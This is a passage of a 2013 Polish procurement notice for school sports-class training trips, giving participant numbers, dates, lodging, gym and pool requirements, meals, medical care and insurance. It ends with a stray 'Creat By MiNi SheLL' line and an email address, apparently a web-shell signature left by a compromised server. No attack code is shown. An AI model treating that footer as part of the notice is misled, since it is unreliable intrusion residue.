2) Wymagany termin pobytu od 08.09.2013 r. - 13.09.2013 r. (pobyt rozpoczyna się obiadem w dniu przyjazdu i kończy obiadem w dniu wyjazdu).
2. MIEJSCOWOŚĆ. ŚRODEK TRANSPORTU
1) Miejscowość: nadmorska
2) Środek transportu - autokar
3. OBIEKT. BAZA NOCLEGOWA. BAZA TRENINGOWA
1) Baza noclegowa - pokoje 2,3,4 osobowe, budynek ( budynki) murowane ze stałym CO.
2) Zakwaterowanie w jednym budynku wraz ze stołówką. Zamawiający dopuszcza, że mogą to być oddzielne budynki, muszą jednak znajdować się na terenie jednego ośrodka wykonawcy.
3) Zamawiający nie dopuszcza łóżek piętrowych.
4) Osobne pokoje dla opiekunów (osobne dla kobiet i osobno dla mężczyzn).
5) Pokoje wyposażone w pełen węzeł sanitarnym.
6) Teren leśny (las, park) do 0,5 km od miejsca zakwaterowania.
7) Morze oddalone od miejsca zakwaterowania do 1 km . 
8) Sala gimnastyczna (wymiary minimum 25m x 15m) dostępna  przez dwie godziny dziennie w każdym dniu pobytu w godzinach 9.00 -13.00 lub 17.00 -21.00.
9) Sauna dostępna w każdym dniu pobytu przez minimum godzinę. 
10) Codziennie dla 20 zawodników 3 zabiegi odnowy biologicznej wyłączając z tego saunę (np. solanki, hydromasaże, masaże itp.)
11) Codziennie 2 godziny dostępu do pływalni krytej.
4. OPIEKA MEDYCZNA
1) Lekarz dochodzący (na wezwanie).
2) Izolatka dla chorych.
3) Zapewnienie leków pierwszej pomocy.
5. WYŻYWIENIE
1) Trzy posiłki dziennie z podwieczorkiem (śniadanie, obiad, kolacja).
2) Suchy prowiant na podróż, sok
3) Codziennie 0,5 l wody mineralnej niegazowanej dla każdego uczestnika obozu.
6. W RAMACH REALIZACJI PRZEDMIOTU ZAMÓWIENIA WYKONAWCA ZOBOWIĄZUJE SIĘ DO:
1) Zapewnienia bezpłatnego pobytu i przejazdu dla opiekunów. 
2) Ubezpieczenie uczestników w czasie podróży i pobytu od nieszczęśliwych wypadków na kwotę nie mniejsza niż 10 00,00 zł..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.24.30.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 08.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4
Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - grupa koszykarzy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. PRZEWIDYWANA ILOŚĆ UCZESTNIKÓW. TERMIN WYJAZDU
1) Przewidywana ilość uczestników 63 osoby (młodzież osoby płatne) + 5 opiekunów (osoby bezpłatne). Razem 68 osób. 
2) Wymagany termin pobytu od 23.09.2013 r. - 28.09.2013 r. (pobyt rozpoczyna się obiadem w dniu przyjazdu i kończy obiadem w dniu wyjazdu).
2. MIEJSCOWOŚĆ. ŚRODEK TRANSPORTU
1) Miejscowość: oddalona do 150 km od Dąbrowy Górniczej.
2) Środek transportu - autokar, bus.
3. OBIEKT. BAZA NOCLEGOWA. BAZA TRENINGOWA
1) Baza noclegowa - pokoje 2,3,4 osobowe, budynek (budynki) murowane ze stałym CO.
2) Zamawiający nie dopuszcza łóżek piętrowych.
3) Zakwaterowanie w jednym budynku wraz ze stołówką. Zamawiający dopuszcza, że mogą to być oddzielne budynki, muszą jednak znajdować się na terenie jednego ośrodka wykonawcy.
4) Osobne pokoje dla opiekunów (osobno dla kobiet i osobno dla mężczyzn).
5) Pokoje wyposażone w pełen węzeł sanitarny.
6) Hala sportowa codziennie w godzinach 9.30-13.00 i 15.30-19.00 oddalona do 1 km od miejsca zakwaterowania z możliwością:
a) korzystania z centralnego, pełnowymiarowego boiska do koszykówki (wymiary 28m x 15m) z namalowanymi liniami zgodnie z obowiązującymi przepisami i obręczami uchylnymi z siatką na wys. 3,05m;
b) wyodrębnienia jednocześnie wszerz 2 lub 3 boisk do koszykówki o wymiarach co najmniej 4m x 14m. 
7) Kolacja wydawana nie wcześniej niż 19.30.
4. OPIEKA MEDYCZNA
1) Lekarz dochodzący (na wezwanie).
2) Izolatka dla chorych.
3) Zapewnienie leków pierwszej pomocy.
5. WYŻYWIENIE
1) Trzy posiłki dziennie z podwieczorkiem (śniadanie, obiad, kolacja).
2) Codziennie 0,5 l wody mineralnej dla każdego uczestnika obozu (? ilości butelek wody nisko zmineralizowanej i ? ilości butelek wody wysoko zmineralizowanej).
3) Suchy prowiant na podróż, sok.
6. W RAMACH REALIZACJI PRZEDMIOTU ZAMÓWIENIA WYKONAWCA ZOBOWIĄZUJE SIĘ DO:
1) Zapewnienia bezpłatnego pobytu i przejazdu dla opiekunów. 
2) Ubezpieczenie uczestników w czasie podróży i pobytu od nieszczęśliwych wypadków na kwotę nie mniejsza niż 10 000,00 zł..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.24.30.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 23.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com